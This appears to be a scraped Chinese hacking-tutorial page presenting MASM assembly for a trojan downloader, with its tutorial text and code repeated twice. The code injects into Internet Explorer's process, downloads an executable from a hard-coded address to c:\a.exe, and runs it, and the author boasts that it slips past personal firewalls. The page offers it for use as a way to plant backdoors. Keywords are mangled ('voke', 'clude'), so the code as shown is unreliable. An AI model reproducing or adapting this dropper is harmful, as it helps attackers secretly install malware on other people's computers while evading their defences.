教你注入下载文件的代码到IE进程然后下载的文件
网站建设 2023-02-09 11:06www.1681989.com免费网站
大家可能都用过网页木马来下真正的EXE木马吧,有些时候
后门比较大下载的时候常常是网页暂停或是报错(CHM木马常遇到)
所以写了这个程序。。。。 程序还要改下才好用哈,不过只有2kb很小了。。。。 编绎参数:
C:\masm32\BIN>type ii.bat
ml /c /coff i.asm
lk /subsystem:wdows i.obj 刚才测试了一下可以逃过天网的应用程序防问网络限制金山网镖也肯定没问题。
; #--------------------------------------# #
; # Injection downloadcode IE --> # #
; # -->also it can jump personal fire wall # #
; # 2004.07.15 #
; # codz: czy # #
; #------------------------------------------# # ;test on w2k server sp4 masm8 .386
.model flat,stdcall
option casemap:none clude ../clude/user32.c
cludelib ../lib/user32.lib
clude ../clude/kernel32.c
cludelib ../lib/kernel32.lib
clude ../clude/wdows.c
.data
hello db ’2K下建远程线程’,0
tit db ’IEFrame’,0
szFormat db ’PID是:%d’,0
szBuffer dd 20 dup(0),0
pid dd 0
hProcess dd 0
hThread dd 0
pCodeRemote dd 0
path1 db ’c:\a.EXE’,0 .const
szmsg db ’URLDownloadToFileA’,0
userdll db ’Urlmon.dll’,0
;szmsg db ’MessageBoxA’,0
;userdll db ’User32.dll’,0
szloadlib db ’LoadLibraryA’,0 ;注意和LoadLibraryW的区别哟
kerdll db ’kernel32.dll’,0 .code
codebeg:
dispdata db "http://192.168.0.5/NBTreeList.exe",0
szTit db "c:\a.exe",0
datalen =$-codebeg
Rproc proc msgbox ;MessageBoxA的地址为参数
CALL @F ;push esi
@@:
POP EBX
SUB EBX,OFFSET @B
LEA ECX,[EBX dispdata]
LEA EDX,[EBX szTit]
push NULL
push 0
push edx
push ecx
push NULL
call msgbox
ret ;重要
Rproc endp
codelen =$-codebeg ;代码长度xx字节 start:
;voke FdWdow,0,offset tit ;返回计算器窗口句柄
voke FdWdow,offset tit,0
voke GetWdowThreadProcessId,eax,offset pid ;计算机器程序的进程PID号
;voke wsprtf,offset szBuffer,offset szFormat,pid ;把PID用十进制显示
voke OpenProcess,PROCESS_ALL_ACCESS,FALSE,pid ;打开进程,得到进程句柄
mov hProcess,eax ;保存进程句柄
voke VirtualAllocEx,hProcess,0, codelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE
mov pCodeRemote,eax
voke WriteProcessMemory,hProcess,pCodeRemote,offset codebeg,codelen,NULL mov esi,pCodeRemote
add esi,datalen
push esi
voke LoadLibrary,offset userdll
voke GetProcAddress,eax,offset szmsg
pop esi
voke CreateRemoteThread,hProcess,0,0,esi,eax,0,0 mov hThread,eax ; 返回线程句柄
.if hThread
voke WaitForSgleObject,hThread, INFINITE ;等待线程结束
voke CloseHandle,hThread ;关闭线程句柄
.endif voke VirtualFreeEx,hProcess,pCodeRemote,codelen,MEM_RELEASE ;释放空间
voke CloseHandle,hProcess ;关闭进程句柄
voke WExec,offset path1,SW_SHOW ;以正常方式执行下载的木马。。到时候改一下就没窗口了。。
;voke MessageBoxA,0,offset szBuffer,offset szBuffer,1
voke ExitProcess,0
end start
后门比较大下载的时候常常是网页暂停或是报错(CHM木马常遇到)
所以写了这个程序。。。。 程序还要改下才好用哈,不过只有2kb很小了。。。。 编绎参数:
C:\masm32\BIN>type ii.bat
ml /c /coff i.asm
lk /subsystem:wdows i.obj 刚才测试了一下可以逃过天网的应用程序防问网络限制金山网镖也肯定没问题。
; #--------------------------------------# #
; # Injection downloadcode IE --> # #
; # -->also it can jump personal fire wall # #
; # 2004.07.15 #
; # codz: czy # #
; #------------------------------------------# # ;test on w2k server sp4 masm8 .386
.model flat,stdcall
option casemap:none clude ../clude/user32.c
cludelib ../lib/user32.lib
clude ../clude/kernel32.c
cludelib ../lib/kernel32.lib
clude ../clude/wdows.c
.data
hello db ’2K下建远程线程’,0
tit db ’IEFrame’,0
szFormat db ’PID是:%d’,0
szBuffer dd 20 dup(0),0
pid dd 0
hProcess dd 0
hThread dd 0
pCodeRemote dd 0
path1 db ’c:\a.EXE’,0 .const
szmsg db ’URLDownloadToFileA’,0
userdll db ’Urlmon.dll’,0
;szmsg db ’MessageBoxA’,0
;userdll db ’User32.dll’,0
szloadlib db ’LoadLibraryA’,0 ;注意和LoadLibraryW的区别哟
kerdll db ’kernel32.dll’,0 .code
codebeg:
dispdata db "http://192.168.0.5/NBTreeList.exe",0
szTit db "c:\a.exe",0
datalen =$-codebeg
Rproc proc msgbox ;MessageBoxA的地址为参数
CALL @F ;push esi
@@:
POP EBX
SUB EBX,OFFSET @B
LEA ECX,[EBX dispdata]
LEA EDX,[EBX szTit]
push NULL
push 0
push edx
push ecx
push NULL
call msgbox
ret ;重要
Rproc endp
codelen =$-codebeg ;代码长度xx字节 start:
;voke FdWdow,0,offset tit ;返回计算器窗口句柄
voke FdWdow,offset tit,0
voke GetWdowThreadProcessId,eax,offset pid ;计算机器程序的进程PID号
;voke wsprtf,offset szBuffer,offset szFormat,pid ;把PID用十进制显示
voke OpenProcess,PROCESS_ALL_ACCESS,FALSE,pid ;打开进程,得到进程句柄
mov hProcess,eax ;保存进程句柄
voke VirtualAllocEx,hProcess,0, codelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE
mov pCodeRemote,eax
voke WriteProcessMemory,hProcess,pCodeRemote,offset codebeg,codelen,NULL mov esi,pCodeRemote
add esi,datalen
push esi
voke LoadLibrary,offset userdll
voke GetProcAddress,eax,offset szmsg
pop esi
voke CreateRemoteThread,hProcess,0,0,esi,eax,0,0 mov hThread,eax ; 返回线程句柄
.if hThread
voke WaitForSgleObject,hThread, INFINITE ;等待线程结束
voke CloseHandle,hThread ;关闭线程句柄
.endif voke VirtualFreeEx,hProcess,pCodeRemote,codelen,MEM_RELEASE ;释放空间
voke CloseHandle,hProcess ;关闭进程句柄
voke WExec,offset path1,SW_SHOW ;以正常方式执行下载的木马。。到时候改一下就没窗口了。。
;voke MessageBoxA,0,offset szBuffer,offset szBuffer,1
voke ExitProcess,0
end start
上一篇:教你成为ASP木马高手
下一篇:破解数据库下载漏洞
网站设计
- 静宁会SEO的网站建设公司:全面提升您的网络影
- 提升在线业务的关键:选择最佳的丽水网站建设
- 浙江网站优化发展潜力如何
- 井研专业的网站建设公司:打造您的在线品牌
- 灵山SEO网站建设公司:提升您的在线业务表现
- 蒙城网站建设优化公司:提升您网站表现的理想
- 阳谷企业网站优化:提升线上业务力的关键
- 樟树专业的网站建设公司:打造您在线业务的坚
- 通河百度SEO排名的策略与技巧
- 重庆百度快照排名如何进行精准的客户引流
- 重庆百度快照排名
- 常宁便宜的建站公司:助您轻松打造在线业务
- 巫溪百度网站优化:提升网站曝光率与流量的关
- 湖北整站优化怎么做才能放大客户需求
- 闸北网站建设多少钱?全面解析与预算规划
- 辽宁企业网站优化怎么做电话营销